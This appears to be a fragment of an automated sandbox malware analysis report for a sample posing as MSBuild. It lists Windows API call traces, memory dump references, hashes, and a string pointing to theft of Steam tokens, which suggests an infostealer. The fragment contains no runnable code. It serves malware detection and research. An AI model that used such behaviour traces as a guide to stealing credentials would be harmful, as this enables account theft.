                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00F6E978,?), ref: 0041001C
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00427383,?,00000000,004225D0,000000FF,?,00418244,?), ref: 004155C7
                                                                                                                                                                                                                                                • Part of subcall function 004153E0: Sleep.KERNEL32(000003E8,00422591,PdA,?,?,?,00000001), ref: 004154A5
                                                                                                                                                                                                                                                • Part of subcall function 004153E0: CreateThread.KERNEL32(00000000,00000000,00413E10,?,00000000,00000000), ref: 004154C6
                                                                                                                                                                                                                                                • Part of subcall function 004153E0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004154D2
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • Soft\Steam\steam_tokens.txt, xrefs: 004155DF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$CreateObjectSingleSleepThreadWaitlstrcat
                                                                                                                                                                                                                                              • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                                                                                                                                              • API String ID: 2356188485-3507145866
                                                                                                                                                                                                                                              • Opcode ID: 82f7f66776da159feb174cd1c052f2c75f514489b5fd89381fe20bfe032bc715
                                                                                                                                                                                                                                              • Instruction ID: 72bb85e2ae34570a401298599826632edfc0c26c1556d4927fbe038025474c9d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 82f7f66776da159feb174cd1c052f2c75f514489b5fd89381fe20bfe032bc715
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91217171800248EACB10EBE5C946BDDBB78AF19314F50417EE515736D2DB7C2708CAB6
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%